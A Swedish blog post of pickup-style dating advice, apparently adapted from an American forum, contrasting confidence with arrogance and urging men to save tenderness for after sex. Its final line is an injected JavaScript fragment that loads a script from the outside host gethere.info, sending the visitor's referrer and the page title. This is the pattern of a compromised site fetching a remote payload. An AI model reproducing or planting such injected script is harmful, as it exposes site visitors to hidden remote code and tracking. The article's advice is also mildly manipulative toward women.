Läste en artikel av en av våra kollegor på ett amerikanskt forum avseende arrogans. Nedan finns det förklarat varför och hur du blir av med det.

Du behöver inte vara arrogant. Det främsta en kvinna i söker i en man är självförtroende. De har dock ingen aning vad det innebär mer än vad du själv har. Låt mig förklara, självförtroende är att veta ditt värde. Att veta att du kan göra saker du vill göra. Att veta att du har viljan och tåligheten att uppnå precis vad du vill.

Veta att du få tjejen att uppleva hennes bästa stund i livet, ge henne mer orgasmer än hon någonsin kommer få på en timme. Få henne henne att känna att hon träffat världen bästa kille.

Att veta att du är bra helt enkelt!

Arrogans är överkompensation som kommer från svagt självförtroende. En person som är arrogant skryter om storleken på sin “bil”, hans prestationer eller vad som helst därför att han söker bekräftelse från andra.

En verkligt kompetent man behöver inte skryta. Däremot, så kräver arrogans självförtroende även om det är falskt och svagt. Du kan vara arrogant och påvisa självförtroende.

Självförtroende är vad kvinnor tänder på, och i och med att attraktion inte är ett val, så spelar det ingen roll om självförtroendet är verkligt, rättvist eller svagt , det knäpper på samma attraktions mekanismer iallafall.

Vissa tror att folk tycker om arroganta människor eftersom det ger dem resultat med kvinnor. Följdaktligen beter de sig arrogant jämt och ständigt, och rättfärdigar sitt beteende med faktumet att det ger dem resultat. Det stämmer att du kan få kvinnor genom att vara arrogant. Men om du vill ha kvalitativa kvinnor som du vill ha till mer än one night stands behöver du lära dig skillnaden mellan självförtroende och arrogans. Många står på den fina linjen mellan självförtroende och arrogans dagligen, det kallas för “Lead Singer Syndrome”.

Denna fråga kommer upp gång på gång och folk säger “Jag är en fin,bra kille, hur kommer jag någonsin träffa en kvinna? Till och med jag, Superman, kan vara en fin och bra kille! Ibland är jag så fin att jag knappt orkar med mig själv. Jag skriver poesi, håller upp dörren och tänder deras cigarretter. Jag köper blommor (sällan, men det händer), jag ger komplimanger till kvinnor, jag säger de sötaste sakerna till dem. Ni skulle hata mig ifall ni såg mig göra det.

Detta motsäger ingen av metoderna. Det handlar inte om att du inte får vara snäll, det handlar om att du måste lära dig när det rätt tillfälle att vara snäll och fin, och när det är tillfälle att hålla allt inom dig. Ibland har jag sagt till kvinnor att hon får mitt hjärta att hoppa över ett slag och det är perfekt accepterat (aaaahh). Men det tillfället är inte första kvällen när du precis har träffat henne.

Faktum att det är någonting som du kan spara i reserv tills efter att ni haft sex och du bestämt dig för att du vill ha kvar henne. På det sättet så säger hon till sina vänner att du är den “gulligaste killen”. Detta efter att hon redan berättat för dem att ni haft sådant fantastiskt sex att hon nästan gjorde på sig i sängen av extas. Det är denna kombination som får kvinnor att vilja ha dig.

Så var den snälla killen! Var den söta och fina killen. Men förstå när du ska sluta vara söt och fin, i annat fall kommer folk trampa på dig. Ha självförtroendet att veta det finns ingen annan kille i stan som kan få hennes värld att gunga. Om inte. Fake it ’till you make it.

Trots att det är arrogans så kommer det att hjälpa dig med kvinnor under perioden det tar dig att förvandla den arrogansen till verklig självförtroende. Glöm inte att tvätta bort det så fort som möjligt bara!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;